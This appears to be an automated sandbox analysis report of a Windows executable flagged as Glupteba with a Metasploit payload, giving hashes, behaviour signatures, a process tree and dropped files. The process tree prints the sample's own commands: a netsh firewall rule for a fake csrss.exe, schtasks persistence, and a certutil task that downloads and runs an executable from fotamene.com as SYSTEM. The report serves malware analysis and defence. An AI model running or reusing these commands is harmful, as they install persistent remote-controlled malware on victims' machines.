Analysis

  • max time kernel
    171s
  • max time network
    196s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    29-01-2023 18:32

General

  • Target

    869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe

  • Size

    3.9MB

  • MD5

    fca1d24ce1db0281ac1c6cdd76fb0882

  • SHA1

    89164a3660a20bc0bbaa2af28a0c9455a77ee04d

  • SHA256

    869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37

  • SHA512

    3a993568d878b22e91e4b17b1283ad3a82263cb01b8dc7e7a66a061d46941f2a4267f439942eaed7ee2123ac6c5e04095627dc43e077e681379fc50abfb1cc4e

  • SSDEEP

    98304:zRgH8qwvzLOxmw8uzYoeEoYWODF45CJYhXj:2H8qIOxmuJeiDaEyX

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 9 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Windows security bypass 2 TTPs 10 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Windows security modification 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Windows directory 3 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
    "C:\Users\Admin\AppData\Local\Temp\869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1496
    • C:\Users\Admin\AppData\Local\Temp\869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
      "C:\Users\Admin\AppData\Local\Temp\869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe"
      2⤵
      • Windows security bypass
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:532
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1984
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Modifies data under HKEY_USERS
          PID:1824
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Modifies system certificate store
        • Suspicious use of AdjustPrivilegeToken
        PID:812
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:1620
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:1676
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          PID:1652
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230129193343.log C:\Windows\Logs\CBS\CbsPersist_20230129193343.cab
    1⤵
    • Drops file in Windows directory
    PID:548

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

    Filesize

    69KB

    MD5

    48d6d16f289f2f87b69dc0aa435d5b54

    SHA1

    d3575906dad0ba16d407d3cf0c17b44033867d8e

    SHA256

    fb965546158d0797062edf59175a5b722df7f793b36a5ca569ea402d227d3314

    SHA512

    589c81cc3ca7db658770c427a303f7a8eeb2bfa7518b3b7acac78affc73a675aacc1fbd529f4260d89ee225bdb6493649b9410b2652bf10b1aa480db135c5fab

  • C:\Windows\rss\csrss.exe

    Filesize

    3.9MB

    MD5

    fca1d24ce1db0281ac1c6cdd76fb0882

    SHA1

    89164a3660a20bc0bbaa2af28a0c9455a77ee04d

    SHA256

    869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37

    SHA512

    3a993568d878b22e91e4b17b1283ad3a82263cb01b8dc7e7a66a061d46941f2a4267f439942eaed7ee2123ac6c5e04095627dc43e077e681379fc50abfb1cc4e

  • \Users\Admin\AppData\Local\Temp\csrss\patch.exe

    Filesize

    576KB

    MD5

    79d239e8c3993b4122bc6c69aa75b98e

    SHA1

    00b153573dbb5e073483ed20fa52c0e858ef50e3

    SHA256

    416f2e005ca28fe636aa88cdf9a58d1301053d93a29d4201fb0eb711885b3e52

    SHA512

    52c1a997f64b317071d37c114d3869055c5085802c1742ac7f471b6960671927707edf27ee44907912d47533a7c0be274279af1ab78fd1da3803c524af5a27ba

  • \Windows\rss\csrss.exe

    Filesize

    3.9MB

    MD5

    fca1d24ce1db0281ac1c6cdd76fb0882

    SHA1

    89164a3660a20bc0bbaa2af28a0c9455a77ee04d

    SHA256

    869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37

    SHA512

    3a993568d878b22e91e4b17b1283ad3a82263cb01b8dc7e7a66a061d46941f2a4267f439942eaed7ee2123ac6c5e04095627dc43e077e681379fc50abfb1cc4e

  • \Windows\rss\csrss.exe

    Filesize

    3.9MB

    MD5

    fca1d24ce1db0281ac1c6cdd76fb0882

    SHA1

    89164a3660a20bc0bbaa2af28a0c9455a77ee04d

    SHA256

    869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37

    SHA512

    3a993568d878b22e91e4b17b1283ad3a82263cb01b8dc7e7a66a061d46941f2a4267f439942eaed7ee2123ac6c5e04095627dc43e077e681379fc50abfb1cc4e

  • memory/532-72-0x0000000000400000-0x0000000000C1F000-memory.dmp

    Filesize

    8.1MB

  • memory/532-63-0x0000000000D00000-0x00000000010A8000-memory.dmp

    Filesize

    3.7MB

  • memory/532-64-0x0000000000400000-0x0000000000C1F000-memory.dmp

    Filesize

    8.1MB

  • memory/532-66-0x0000000000400000-0x0000000000C1F000-memory.dmp

    Filesize

    8.1MB

  • memory/532-60-0x0000000000D00000-0x00000000010A8000-memory.dmp

    Filesize

    3.7MB

  • memory/812-71-0x0000000000ED0000-0x0000000001278000-memory.dmp

    Filesize

    3.7MB

  • memory/812-76-0x0000000000400000-0x0000000000C1F000-memory.dmp

    Filesize

    8.1MB

  • memory/812-75-0x0000000000ED0000-0x0000000001278000-memory.dmp

    Filesize

    3.7MB

  • memory/812-74-0x0000000000400000-0x0000000000C1F000-memory.dmp

    Filesize

    8.1MB

  • memory/812-73-0x0000000000ED0000-0x0000000001278000-memory.dmp

    Filesize

    3.7MB

  • memory/812-69-0x0000000000000000-mapping.dmp

  • memory/1496-58-0x0000000000400000-0x0000000000C1F000-memory.dmp

    Filesize

    8.1MB

  • memory/1496-57-0x0000000000400000-0x0000000000C1F000-memory.dmp

    Filesize

    8.1MB

  • memory/1496-54-0x0000000000DE0000-0x0000000001188000-memory.dmp

    Filesize

    3.7MB

  • memory/1496-59-0x0000000000400000-0x0000000000C1F000-memory.dmp

    Filesize

    8.1MB

  • memory/1496-56-0x0000000001190000-0x0000000001995000-memory.dmp

    Filesize

    8.0MB

  • memory/1496-55-0x0000000000DE0000-0x0000000001188000-memory.dmp

    Filesize

    3.7MB

  • memory/1824-65-0x000007FEFB8A1000-0x000007FEFB8A3000-memory.dmp

    Filesize

    8KB

  • memory/1824-62-0x0000000000000000-mapping.dmp

  • memory/1984-61-0x0000000000000000-mapping.dmp